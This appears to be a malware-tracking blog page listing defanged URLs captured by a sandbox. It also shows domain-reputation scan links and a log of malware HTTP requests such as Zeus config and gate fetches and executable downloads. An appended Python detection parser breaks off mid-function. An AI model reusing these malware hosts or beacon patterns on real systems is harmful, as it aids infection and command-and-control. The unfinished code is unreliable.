Tag Archives: dangerous urls

Recent Malware URLs captured by NoVirusThanks Sandbox

These URLs are malicious or related to malware:

hxxp://caperiod.com/pxxko/ndrei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/wjwjwaobfs.php?adv=adv401&id=1626783411&c=203332757
hxxp://getpersgd09.com/persgd09/setup.php?track_id=30046
hxxp://gopersgd09.com/install/?track_id=30046
hxxp://carefinder.com.au/inf.php
hxxp://scr4zy.webcindario.com/2/infects.php
hxxp://elmejorbonche.com/dns
hxxp://photopath.in/8797hkj9jk9j778kj9h78k9jh.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://www.easyenco.co.kr/module/program/media_codec.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=media_codec.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=media_codec.exe
hxxp://c0re.su/panel/config.bin
hxxp://ck4.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://201.25.28.9/mail/images/info.php
hxxp://startfaredata.in/o54p6ipo546ipo6.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eH
hxxp://tecnp.h19.ru/in.php
hxxp://www.cplnn.com/bbcount.php?action=knock&build=sp1
hxxp://www.cplnn.com/wad/init3.php?build=
hxxp://mmm-2011.co.uk/setup2683.exe
hxxp://mmm-2011.co.uk/ka.exe
hxxp://cekcuc.ru/z/kilka.bin
hxxp://up1.free-sms.co.kr/main/free07/smsupsetting.dat
hxxp://up1.free-sms.co.kr/main/free07/smsins.exe
hxxp://up1.free-sms.co.kr/main/free07/smsdat.dat
hxxp://up1.free-sms.co.kr/upapp/free07/eventex.exe
hxxp://free-sms.co.kr/app_count/install_count.php?&pid=free07&mac=%MAC%
hxxp://up1.free-sms.co.kr/main/free07/free-sms.exe
hxxp://up1.free-sms.co.kr/main/free07/uninst.exe
hxxp://up1.free-sms.co.kr/main/free07/free-sms.ico
hxxp://up1.free-sms.co.kr/main/free07/smsupv.exe
hxxp://ppppnipponp.r7m.us/cgi-bin/p.cgi
hxxp://flashpile.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHy
hxxp://neframeofwork.com/gud/hig.op
hxxp://ad.ring3.info/Config.asp
hxxp://ad.ring3.info/Count/Count.asp
hxxp://www.bbsv.nl/files/cache/.../contador.php
hxxp://firstresour.web135.discountasp.net/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=fbgen&v=1
hxxp://shellybeachskiboatclub.co.za/.sys.php?action=aolsbm&v=1&hardid=%HDID%&id=0
hxxp://blognote.by/f/fn.txt
hxxp://www.caesar.sk/downloads/getc/getc.php
hxxp://114.200.199.251/apsuy.php
hxxp://iring4u.co.kr/bcklist.php
hxxp://ad79.co.kr/prex/newb/apsuo.exe
hxxp://114.200.199.251/b5ains.php?mac=%MAC%&ip=%LANIP%&pid=&setup=1
hxxp://114.200.199.251/b5aliveins.php?mac=%MAC%&ip=%LANIP%&pid=&app=
hxxp://caperiod.com/pxxko/iwwnnrvi.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/klppp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/sftkxkb.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/cpptuxlpc.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/oyppct.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/obcptx.php?adv=adv401&id=1626783411&c=203332757
hxxp://gamafotolembranca.com.br/masters/byte.gif
hxxp://gamafotolembranca.com.br/masters/mega.gif
hxxp://gamafotolembranca.com.br/masters/tera.gif
hxxp://www.basedeclientes.com.br/versao_px.txt
hxxp://myck.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://celinhaz.sites.uol.com.br/autor2.jpg
hxxp://www.avisosbaladabelemhh.com.br/files/j1/inf/arq.php
hxxp://caperiod.com/pxxko/xxobo.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/pcppgk.php?adv=adv401&id=1626783411&c=203332757
hxxp://webmail.imicro.com.br/SQL/cashkey.gif
hxxp://searcham.org/404.php?type=stats&affid=527&subid=02&iruns
hxxp://w.nucleardiscover.com:888/list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B&v=2&t=0,5870172
hxxp://ru.coolnuff.com:2011/myck.jpg?t=0,1209528
hxxp://w.nucleardiscover.com:888/sn.php?c=C1DF13F78111F6528E63540E077DCF0C0&t=0,8235895
hxxp://w.nucleardiscover.com:888/sn.php?c=4D535BBF44D4BC186F82F8A2A1DB468528B&t=0,2664606
hxxp://58.150.174.222/baz001.jpg?t=0,4474756
hxxp://w.nucleardiscover.com:888/sn.php?c=B9A76E8AC252E133E3FEAAF11C54E417E770B&t=0,1963922
hxxp://w.nucleardiscover.com:888/sn.php?c=9D83997D1A8A28FA809D6239A9E1FF0CAB3C0&t=0,1260797
hxxp://searchattention.org/404.php?type=stats&affid=531&subid=01&iruns
hxxp://www.easyenco.co.kr/module/program/nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count.asp?exec=nvsvc32.exe
hxxp://www.easyenco.co.kr/module/count_live.asp?exec=nvsvc32.exe
hxxp://caperiod.com/pxxko/jjnaeei.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gqquulypp.php?adv=adv401&id=1626783411&c=203332757
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JNN0&code2=5103
hxxp://www.ilonexs.de/envio/gds32.dll
hxxp://www.familiennavigator.de/components/com_kunena/template/igt.php
hxxp://qd6170.91mt.com/asp/xg.asp
hxxp://qd6170.91mt.com/exe/key2/key_0605.exe
hxxp://key.91mt.com/newkey.php
hxxp://rh508.91mt.com/tj.asp?id=1
hxxp://ups.1gb.ru/services6.exe
hxxp://ekobit.com.pl/cls/Output.exe
hxxp://xn.bisque110.com/yt.php
hxxp://xn.bisque110.com/lf
hxxp://122.770304123.cn/1.gif
hxxp://122.770304123.cn/ue000/38sw.e?uid=162678341112952317322438
hxxp://110.770304123.cn/1.gif
hxxp://110.770304123.cn/player/blog.updata?v=1.1.8.1&r1=0009a83babc21d46591d009e616da91a&tm=2011-06-12%2003:55:28&os=Windows%20XP.2600%20with%20Service%20Pack%202&uid=002678341112952317328300&cht=0
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=GO00&code2=0200&id=102678
hxxp://coursu.com/admin22/server[php]/config.bin
hxxp://ad79.co.kr/fie/sningal.exe
hxxp://114.200.199.251/fie/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/fie/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://iring4u.co.kr/favorbutton.php
hxxp://face-herault.org/images/ads/info.php
hxxp://lkrgn.ivepointedya.com/webyx/settings.cfg?build=501&os=XP
hxxp://network.emloud.com/webyx/iLog.php?dl=5.0&log=Loader%205.0%20~%20Ran
hxxp://consolewaspogad.com/czl/zlo.cl
hxxp://icvaircl.cn/dll/44.dll
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=2
hxxp://icvaircl.cn/update.db
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=4
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=9
hxxp://icvaircl.cn/stat.php?w=44&i=a7157a4db6097a4d51eacb5987fd206c&a=11
hxxp://xylahavowi.com/1023000112
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOM0&code2=4203
hxxp://jennifermusic.nl/logo2.jpg
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=JOP0&code2=7203
hxxp://fastsearchportal.org/cfg/miniav.psd
hxxp://fastsearchportal.org/cfg/stopav.psd
hxxp://fastsearchportal.org/cfg/passw.psd
hxxp://fastsearchportal.org/pyvcu.php3
hxxp://fastsearchportal.org/ungtsmsuopstfsjjxaqhpksdi.phtml
hxxp://fastsearchportal.org/mccmkbawzojuijhsyttn.inc
hxxp://fastsearchportal.org/onqyofrbc.phtm
hxxp://myavava.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrOeDmJ4Q6O41eHyF2e
hxxp://clashjamwallop.in/90ds8c9ds8c9d0s8cds.php?ini=v22MnDTkT9enCDVl61YdHLJrO
hxxp://adordota.com/bandwidth.bin
hxxp://einemenge.info/webpanel/alive.php?key=grills22&pcuser=%PCUSER%&pcname=%PCNAME%&hwid=%HWID%&country=Italy
hxxp://caperiod.com/pxxko/gggklycc.php?adv=adv401&code1=KOR0&code2=9204
hxxp://JOSEMORAISTA.net/Machine.jpg
hxxp://JOSEMORAISTA.net/andeikyu.jpg
hxxp://mariadacoceicaopraxedes.net/GetString.aspx
hxxp://mariadacoceicaopraxedes.net/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612045029
hxxp://mariadacoceicaopraxedes.net/COMCTL32.OCA.zip
hxxp://s350098374.onlinehome.us/mys.ini
hxxp://rmhpzusmfhtpnt.biz/news/?s=167674
hxxp://axvkxnuutylqdtu.com/news/?s=90742
hxxp://outoszjfvqtyonk.net/news/?s=24872
hxxp://114.200.199.251/vanir.php
hxxp://114.200.199.251/b7ins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&setup=1
hxxp://114.200.199.251/b7liveins.php?mac=%MAC%&ip=%LANIP%&pid=vanir&app=
hxxp://privatesystem-softshieldprotect.com/favicon.ico?0=78&1=4&2=2&3=80&4=i-s
hxxp://212.150.164.204/flash/flashplayer.jpg
hxxp://www.increasingly.kr/Module/gomserv.exe
hxxp://www.increasingly.kr/Module/count.html?exec=gomserv.exe&instFile=gomserv.exe
hxxp://www.increasingly.kr/Module/count_live.html?exec=gomserv.exe
hxxp://windoslive.hotmail.ru/090043043543034877799.exe
hxxp://searchbehind.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://mygateforex.co.za/.sys.php?action=fbgen&v=1
hxxp://richardwiggers.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=fbgen&v=1
hxxp://www.obi-labs.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=0
hxxp://rvl.it/.sys.php?action=fbgen&v=1
hxxp://www.irishpub.fo/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=fbgen&v=1
hxxp://lets-exoticpets.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=1
hxxp://slcsc.co.uk/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=fbgen&v=1
hxxp://voodoobarbcue.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=2
hxxp://robertjakobsen.com/.sys.php?action=fbgen&v=1
hxxp://crosslinkhk.com/.sys.php?action=fbgen&v=1
hxxp://skybluephoto.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=fbgen&v=1
hxxp://3mates.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=3
hxxp://www.crabapplesound.com/.sys.php?action=fbgen&v=1
hxxp://www.crabapplesound.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=4
hxxp://kidnet.co.il/.sys.php?action=fbgen&v=1
hxxp://gulko.co.za/.sys.php?action=fbgen&v=1
hxxp://shieldteens.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=5
hxxp://pflco.com/.sys.php?action=fbgen&v=1
hxxp://pflco.com/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=6
hxxp://my-mobility.co.za/.sys.php?action=fbgen&v=1
hxxp://wcw.co.za/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=7
hxxp://emergencyshelter.us/.sys.php?action=fbgen&v=1
hxxp://emergencyshelter.us/.sys.php?action=tumgen&mode=gen&v=1&hardid=%HDID%&email=&cnt=8
hxxp://www.aandedoorns.co.za/.sys.php?action=fbgen&v=1
hxxp://ad79.co.kr/prex/taurus/taurus.exe
hxxp://ad79.co.kr/dico/sDico.exe
hxxp://ad79.co.kr/prex/taurus/staurus.exe
hxxp://114.200.199.251/version2.php
hxxp://114.200.199.251/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=taurus&install=1
hxxp://iring4u.co.kr/dico/dico.php
hxxp://iring4u.co.kr/dico/statins.php?mac=%MAC%&compare=%MAC%&ip=%LANIP%&pid=&install=1
hxxp://114.200.199.251/liveins.php?mac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://iring4u.co.kr/dico/liveins.php?mac=%MAC%&ip=%LANIP%&pid=
hxxp://pc-guarrantor-utility.com/favicon.ico?0=80&1660=0&2=1&3000=82&4000=i-s
hxxp://key.91mt.com/diykey.php
hxxp://limpidoscomercio.com.br/GetString.aspx
hxxp://limpidoscomercio.com.br/Query.aspx
hxxp://98.158.182.229/~milhomem/ver.txt?20110612141104
hxxp://limpidoscomercio.com.br/COMCTL32.OCA.zip
hxxp://limpidoscomercio.com.br/COMCTL32.OCX.zip
hxxp://petchaburi.kr/kwd/hkwd.php
hxxp://petchaburi.kr/kwd/dkwd.php
hxxp://petchaburi.kr/check/check.php?m=b
hxxp://64.31.58.237/brn.txt
hxxp://64.31.58.237/brn.php
hxxp://key.91mt.com/list/getpmnum.asp?id=f9435d25636a746f
hxxp://key.91mt.com/list/getpmnum2.asp?id=f9435d25636a746f
hxxp://114.200.199.251/ngliveins.php?pmac=0&lmac=%MAC%&ip=%LANIP%&pid=taurus
hxxp://www.hyap98.com/123/mh.txt
hxxp://www.hyap98.com/123/rx.txt
hxxp://www.hyap98.com/123/wc.txt
hxxp://www.hyap98.com/123/wm.txt
hxxp://www.hyap98.com/123/wow.txt
hxxp://w.nucleardiscover.com:888/sn.php?c=DCC228CCD04021858368C8936B1023D74A8&t=9,005374E-02
hxxp://w.nucleardiscover.com:888/sn.php?c=18064AAE3FAF34908C67CC976A11E317&t=0,3627588
hxxp://searcham.org/404.php?type=stats&affid=531&subid=03&iruns
hxxp://s350098374.onlinehome.us/update.php
hxxp://key.91mt.com/list/getpmnum.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum2.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/clickpm.asp?id=e69ec59abbe3c794
hxxp://key.91mt.com/list/getpmnum.asp?id=fa67a8111002230d
hxxp://key.91mt.com/list/getpmnum2.asp?id=fa67a8111002230d
hxxp://98.158.182.229/~milhomem/ver.txt?20110612154053
hxxp://ck3.nucleardiscover.com:88/p6.asp?MAC=%MAC%&Publicer=100
hxxp://w.nucleardiscover.com:888/sn.php?c=948A7D999D0D9733C5285903F882FB388219AB9DA&t=0,894787
hxxp://w.nucleardiscover.com:888/sn.php?c=E1FF76924BDB00A47B96A8F2F18B995A4AD1A593F&t=0,5531122
hxxp://58.150.174.222/baz001.jpg?t=0,8852045
hxxp://131207db062d.dynazzy.net/get2.php?c=TCBIJIJK&d=26606B67393437333F2F676268307D3F22202323
hxxp://w.nucleardiscover.com:888/sn.php?c=4E5018FC71E12DFFD2CFCA91DB93&t=0,2665522
hxxp://w.nucleardiscover.com:888/sn.php?c=1F01DE3AC95905D70C11B&t=0,5650751
hxxp://ru.coolnuff.com:2011/ck3.jpg?t=0,4463007
hxxp://w.nucleardiscover.com:888/sn.php?c=3B25E90DC1513CEEB45CC6EB96EEC230&t=0,7814447
hxxp://w.nucleardiscover.com:888/sn.php?c=918FA94D78E873A13CD4E5C8502&t=0,8195307
hxxp://ru.coolnuff.com:2011/ck4.jpg?t=0,3862421
hxxp://w.nucleardiscover.com:888/sn.php?c=F8E65FBB45D53793A54EFCA7C5BEEB&t=0,3606684
hxxp://xylahavowi.com/1023000112
hxxp://tekefihamib.com/10230001124255461742
hxxp://tekefihamib.com/buy.html

URLVoid domain analysis:

http://www.urlvoid.com/scan/caperiod.com
http://www.urlvoid.com/scan/getpersgd09.com
http://www.urlvoid.com/scan/gopersgd09.com
http://www.urlvoid.com/scan/carefinder.com.au
http://www.urlvoid.com/scan/scr4zy.webcindario.com
http://www.urlvoid.com/scan/elmejorbonche.com
http://www.urlvoid.com/scan/photopath.in
http://www.urlvoid.com/scan/easyenco.co.kr
http://www.urlvoid.com/scan/c0re.su
http://www.urlvoid.com/scan/ck4.nucleardiscover.com
http://www.urlvoid.com/scan/201.25.28.9
http://www.urlvoid.com/scan/startfaredata.in
http://www.urlvoid.com/scan/tecnp.h19.ru
http://www.urlvoid.com/scan/cplnn.com
http://www.urlvoid.com/scan/mmm-2011.co.uk
http://www.urlvoid.com/scan/cekcuc.ru
http://www.urlvoid.com/scan/up1.free-sms.co.kr
http://www.urlvoid.com/scan/free-sms.co.kr
http://www.urlvoid.com/scan/ppppnipponp.r7m.us
http://www.urlvoid.com/scan/flashpile.in
http://www.urlvoid.com/scan/neframeofwork.com
http://www.urlvoid.com/scan/ad.ring3.info
http://www.urlvoid.com/scan/bbsv.nl
http://www.urlvoid.com/scan/firstresour.web135.discountasp.net
http://www.urlvoid.com/scan/shellybeachskiboatclub.co.za
http://www.urlvoid.com/scan/blognote.by
http://www.urlvoid.com/scan/caesar.sk
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/iring4u.co.kr
http://www.urlvoid.com/scan/ad79.co.kr
http://www.urlvoid.com/scan/gamafotolembranca.com.br
http://www.urlvoid.com/scan/basedeclientes.com.br
http://www.urlvoid.com/scan/myck.nucleardiscover.com
http://www.urlvoid.com/scan/celinhaz.sites.uol.com.br
http://www.urlvoid.com/scan/avisosbaladabelemhh.com.br
http://www.urlvoid.com/scan/webmail.imicro.com.br
http://www.urlvoid.com/scan/searcham.org
http://www.urlvoid.com/scan/w.nucleardiscover.com
http://www.urlvoid.com/scan/ru.coolnuff.com
http://www.ipvoid.com/scan/58.150.174.222
http://www.urlvoid.com/scan/searchattention.org
http://www.urlvoid.com/scan/ilonexs.de
http://www.urlvoid.com/scan/familiennavigator.de
http://www.urlvoid.com/scan/qd6170.91mt.com
http://www.urlvoid.com/scan/key.91mt.com
http://www.urlvoid.com/scan/rh508.91mt.com
http://www.urlvoid.com/scan/ups.1gb.ru
http://www.urlvoid.com/scan/ekobit.com.pl
http://www.urlvoid.com/scan/xn.bisque110.com
http://www.urlvoid.com/scan/122.770304123.cn
http://www.urlvoid.com/scan/110.770304123.cn
http://www.urlvoid.com/scan/coursu.com
http://www.urlvoid.com/scan/face-herault.org
http://www.urlvoid.com/scan/lkrgn.ivepointedya.com
http://www.urlvoid.com/scan/network.emloud.com
http://www.urlvoid.com/scan/consolewaspogad.com
http://www.urlvoid.com/scan/icvaircl.cn
http://www.urlvoid.com/scan/xylahavowi.com
http://www.urlvoid.com/scan/jennifermusic.nl
http://www.urlvoid.com/scan/fastsearchportal.org
http://www.urlvoid.com/scan/myavava.in
http://www.urlvoid.com/scan/clashjamwallop.in
http://www.urlvoid.com/scan/adordota.com
http://www.urlvoid.com/scan/einemenge.info
http://www.urlvoid.com/scan/JOSEMORAISTA.net
http://www.urlvoid.com/scan/mariadacoceicaopraxedes.net
http://www.ipvoid.com/scan/98.158.182.229
http://www.urlvoid.com/scan/s350098374.onlinehome.us
http://www.urlvoid.com/scan/rmhpzusmfhtpnt.biz
http://www.urlvoid.com/scan/axvkxnuutylqdtu.com
http://www.urlvoid.com/scan/outoszjfvqtyonk.net
http://www.urlvoid.com/scan/privatesystem-softshieldprotect.com
http://www.ipvoid.com/scan/212.150.164.204
http://www.urlvoid.com/scan/increasingly.kr
http://www.urlvoid.com/scan/windoslive.hotmail.ru
http://www.urlvoid.com/scan/searchbehind.org
http://www.urlvoid.com/scan/mygateforex.co.za
http://www.urlvoid.com/scan/richardwiggers.com
http://www.urlvoid.com/scan/obi-labs.com
http://www.urlvoid.com/scan/rvl.it
http://www.urlvoid.com/scan/irishpub.fo
http://www.urlvoid.com/scan/lets-exoticpets.co.za
http://www.urlvoid.com/scan/slcsc.co.uk
http://www.urlvoid.com/scan/voodoobarbcue.com
http://www.urlvoid.com/scan/robertjakobsen.com
http://www.urlvoid.com/scan/crosslinkhk.com
http://www.urlvoid.com/scan/skybluephoto.com
http://www.urlvoid.com/scan/3mates.com
http://www.urlvoid.com/scan/crabapplesound.com
http://www.urlvoid.com/scan/kidnet.co.il
http://www.urlvoid.com/scan/gulko.co.za
http://www.urlvoid.com/scan/shieldteens.co.za
http://www.urlvoid.com/scan/wcw.co.za
http://www.urlvoid.com/scan/pflco.com
http://www.urlvoid.com/scan/my-mobility.co.za
http://www.urlvoid.com/scan/emergencyshelter.us
http://www.urlvoid.com/scan/aandedoorns.co.za
http://www.ipvoid.com/scan/114.200.199.251
http://www.urlvoid.com/scan/pc-guarrantor-utility.com
http://www.urlvoid.com/scan/limpidoscomercio.com.br
http://www.urlvoid.com/scan/petchaburi.kr
http://www.ipvoid.com/scan/64.31.58.237
http://www.urlvoid.com/scan/hyap98.com
http://www.urlvoid.com/scan/ck3.nucleardiscover.com
http://www.urlvoid.com/scan/131207db062d.dynazzy.net
http://www.urlvoid.com/scan/tekefihamib.com

Recent malicious URLs analyzed #3

Report of the logged malicious URLs:

POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in
 
POST /logos/XXX/61e3a327d/logo.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: greatwebdata. in
 
POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in
 
POST /perce/XXX/21c383b7c/qwerce.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: migented. in
 
POST /college_news/college_news/college_news/college_news/build.php HTTP/1.0
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /help.txt HTTP/1.1
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Host: www.cnscut. cn
 
GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136
 
GET /gx/444.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: toxtb. info
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /gx2/333.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ucfya. info
 
POST /zeus/zeus/server%5bphp%5d/gate.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.nxmtv. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1015000813 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: susimumezez. com
 
GET /v14/setup.php?act=fb_start&id=XXX HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /1/210.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: udjng. info
 
GET /v14/setup.php?act=fb_get HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ddk100. com
 
GET /xztj/555.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rvvxe. info
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hawfruit. com
 
GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: hslibrary. com
 
GET /2wave.php?Yfe6r8M2QkJI0l5aLwkkExXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://ad.adserverplus. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: utling. com
 
POST /1wave.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: topsaj. com
 
GET /2wave.php?Yfe6r8U2QkJI0l5aLw0mEQKjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: http://trailersandvideos. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
 
GET /xztj1/888.txt HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: qvnok. info
 
GET /in.cgi?groups HTTP/1.0
Referer: hxxp://sl.servednetworks. com/www/delivery/afr.php?zoneid=57&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: m28m. in
 
GET /2wave.php?Yfe6r8k2QkJI0l5aLQwvHBXuhTmDw4fxMdTKZ54jDfbUwHqhI/MuDdF/zZvXnLZr HTTP/1.0
Referer: hxxp://www.investopedia. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: thevehic. com
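The request captures in this report, in report #2 below, and in the network-traffic section of the cracked-software post further down all share one plain layout: a request line, optional User-Agent, Referer or Content-Type headers, and a Host line defanged with a space before the TLD. The parser below is an added example, not code from NoVirusThanks or from this page; it re-fangs the hosts, produces the unique host list for a blocklist, and flags requests with the traits that recur in these captures: a non-browser User-Agent (the "wget 3.0", "NSIS_Inetc" and "Indy Library" strings seen above), a POST to a path that pretends to be an image, a fetch of an executable, and a config.bin or gate.php path. The sample log is constructed from six of the requests above with the download token shortened to XXX as the report itself does; the marker list and flag names are my own heuristics, not a vendor signature.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# User-Agent fragments that no real browser sends but that recur in the captures
# on this page. Heuristic list (my own), not a vendor signature.
SUSPICIOUS_UA_MARKERS = ("wget", "NSIS_Inetc", "Indy Library", "Mozilla/6.0")

# Constructed sample: six requests copied from the report above.
SAMPLE_LOG = """
POST /kj97hk9878b8j9hb.php?ini=XXX HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: simplycomics. in

POST /werber/b10353d72/217.gif HTTP/1.1
User-Agent: Mozilla/6.0 (Windows; wget 3.0)
Host: droolbuy. in

GET /zeus/zeus/config.bin HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.206.200.242

GET /images/Telegrama.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 80.13.172.136

GET /download.php?token=XXX HTTP/1.0
User-Agent: NSIS_Inetc (Mozilla)
Host: 5630.zdropp.co. cc

GET /2wave.php?Yfe6r8E2QkJI0l5aLw0nFAqjiyWNidTqKNSAKIduCPnN2WO7JO4xDtdtjJndzsJ2hg== HTTP/1.0
Referer: hxxp://tubefaster. com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mattfoy. com
"""


@dataclass
class Request:
    method: str
    path: str
    host: str = ""
    user_agent: str = ""
    referer: str = ""
    flags: list[str] = field(default_factory=list)


def refang(host: str) -> str:
    """Undo the 'simplycomics. in' style defanging used in the report."""
    return re.sub(r"\.\s+", ".", host.strip())


def flag_request(req: Request) -> list[str]:
    """Return the traits that make a request worth a closer look."""
    flags: list[str] = []
    ua = req.user_agent.lower()
    if any(marker.lower() in ua for marker in SUSPICIOUS_UA_MARKERS):
        flags.append("non-browser-ua")
    if req.method == "POST" and re.search(r"\.(gif|jpg|png)$", req.path, re.I):
        flags.append("post-to-image-path")  # upload disguised as an image fetch
    if re.search(r"\.(exe|bin|dll)(\?|$)", req.path, re.I):
        flags.append("binary-download")
    if re.search(r"(?:^|/)(gate|config)\.(php|bin)(\?|$)", req.path, re.I):
        flags.append("c2-style-path")
    return flags


def parse_requests(log: str) -> list[Request]:
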